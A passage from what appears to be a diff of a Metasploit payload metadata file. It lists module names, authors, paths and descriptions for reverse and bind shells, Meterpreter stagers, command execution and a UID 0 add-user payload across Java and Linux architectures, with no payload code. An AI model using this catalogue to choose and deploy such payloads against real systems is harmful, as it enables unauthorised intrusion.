false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/tight_loop": { - "name": "Generic x86 Tight Loop", - "fullname": "payload/generic/tight_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jduck " - ], - "description": "Generate a tight loop in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/tight_loop.rb", - "is_install_path": true, - "ref_name": "generic/tight_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_java/jsp_shell_bind_tcp": { - "name": "Java JSP Command Shell, Bind TCP Inline", - "fullname": "payload/java/jsp_shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux,OSX,Solaris,Unix,Windows", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/java/jsp_shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "java/jsp_shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_java/jsp_shell_reverse_tcp": { - "name": "Java JSP Command Shell, Reverse TCP Inline", - "fullname": "payload/java/jsp_shell_reverse_tcp", 
- "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux,OSX,Solaris,Unix,Windows", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "java/jsp_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_java/meterpreter/bind_tcp": { - "name": "Java Meterpreter, Java Bind TCP Stager", - "fullname": "payload/java/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Java.\n\nListen for a connection", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/bind_tcp.rb", - "is_install_path": true, - "ref_name": "java/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/meterpreter", - "stager_refname": "java/bind_tcp" - }, - "payload_java/meterpreter/reverse_http": { - "name": "Java Meterpreter, Java Reverse HTTP Stager", - "fullname": "payload/java/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves", - "hdm " - ], - "description": "Run a 
meterpreter server in Java.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/reverse_http.rb", - "is_install_path": true, - "ref_name": "java/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/meterpreter", - "stager_refname": "java/reverse_http" - }, - "payload_java/meterpreter/reverse_https": { - "name": "Java Meterpreter, Java Reverse HTTPS Stager", - "fullname": "payload/java/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves", - "hdm " - ], - "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTPS", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/reverse_https.rb", - "is_install_path": true, - "ref_name": "java/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/meterpreter", - "stager_refname": "java/reverse_https" - }, - "payload_java/meterpreter/reverse_tcp": { - "name": "Java Meterpreter, Java Reverse TCP Stager", - "fullname": "payload/java/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Java.\n\nConnect 
back stager", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "java/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/meterpreter", - "stager_refname": "java/reverse_tcp" - }, - "payload_java/shell/bind_tcp": { - "name": "Command Shell, Java Bind TCP Stager", - "fullname": "payload/java/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt " - ], - "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nListen for a connection", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/bind_tcp.rb", - "is_install_path": true, - "ref_name": "java/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/shell", - "stager_refname": "java/bind_tcp" - }, - "payload_java/shell/reverse_tcp": { - "name": "Command Shell, Java Reverse TCP Stager", - "fullname": "payload/java/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt " - ], - "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nConnect back stager", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/java/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "java/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "java/shell", - "stager_refname": "java/reverse_tcp" - }, - "payload_java/shell_reverse_tcp": { - "name": "Java Command Shell, Reverse TCP Inline", - "fullname": "payload/java/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Java", - "arch": "java", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/java/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "java/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/aarch64/meterpreter/reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Stager", - "fullname": "payload/linux/aarch64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", - 
"is_install_path": true, - "ref_name": "linux/aarch64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/aarch64/meterpreter", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_linux/aarch64/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/aarch64/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb", - "is_install_path": 
true, - "ref_name": "linux/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/aarch64/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/aarch64/shell/reverse_tcp": { - "name": "Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/aarch64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "dup2 socket in x12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/aarch64/shell", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_linux/aarch64/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armbe/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/armbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/armbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armbe/meterpreter_reverse_https": { - "name": "Linux 
Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/armbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/armbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armbe/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/armbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armbe/shell_bind_tcp": { - "name": "Linux ARM Big Endian Command Shell, Bind TCP Inline", - "fullname": "payload/linux/armbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": 
null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" - ], - "platform": "Linux", - "arch": "armbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/adduser": { - "name": "Linux Add User", - "fullname": "payload/linux/armle/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Jonathan Salwan" - ], - "description": "Create a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/adduser.rb", - "is_install_path": true, - "ref_name": "linux/armle/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/armle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Jonathan Salwan" - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/exec.rb", - "is_install_path": true, - "ref_name": "linux/armle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/meterpreter/bind_tcp": { - "name": "Linux Meterpreter, Bind TCP Stager", - "fullname": "payload/linux/armle/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "nemo " - ], - "description": "Inject the mettle server payload (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_linux/armle/meterpreter/reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Stager", - "fullname": "payload/linux/armle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "nemo ", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", - "is_install_path": 
true, - "ref_name": "linux/armle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_linux/armle/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": 
"linux/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/shell/bind_tcp": { - "name": "Linux dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/linux/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo " - ], - "description": "dup2 socket in r12, then execve.\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/armle/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - 
"stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_linux/armle/shell/reverse_tcp": { - "name": "Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo ", - "tkmru" - ], - "description": "dup2 socket in r12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/armle/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_linux/armle/shell_bind_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "civ", - "hal" - ], - "description": "Connect to target and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/armle/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP 
Inline", - "fullname": "payload/linux/armle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "civ" - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mips64/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/mips64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mips64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/mips64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mips64/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/mips64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent 
Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mips64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/mips64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mips64/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/mips64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "mips64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mips64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/mipsbe/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Michael Messner ", - "entropy " - ], - "description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", - "references": [ - "EDB-17940" - ], - "platform": 
"Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsbe/exec.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsbe/meterpreter/reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Stager", - "fullname": "payload/linux/mipsbe/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsbe/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/mipsbe/meterpreter", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_linux/mipsbe/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/mipsbe/meterpreter_reverse_http", 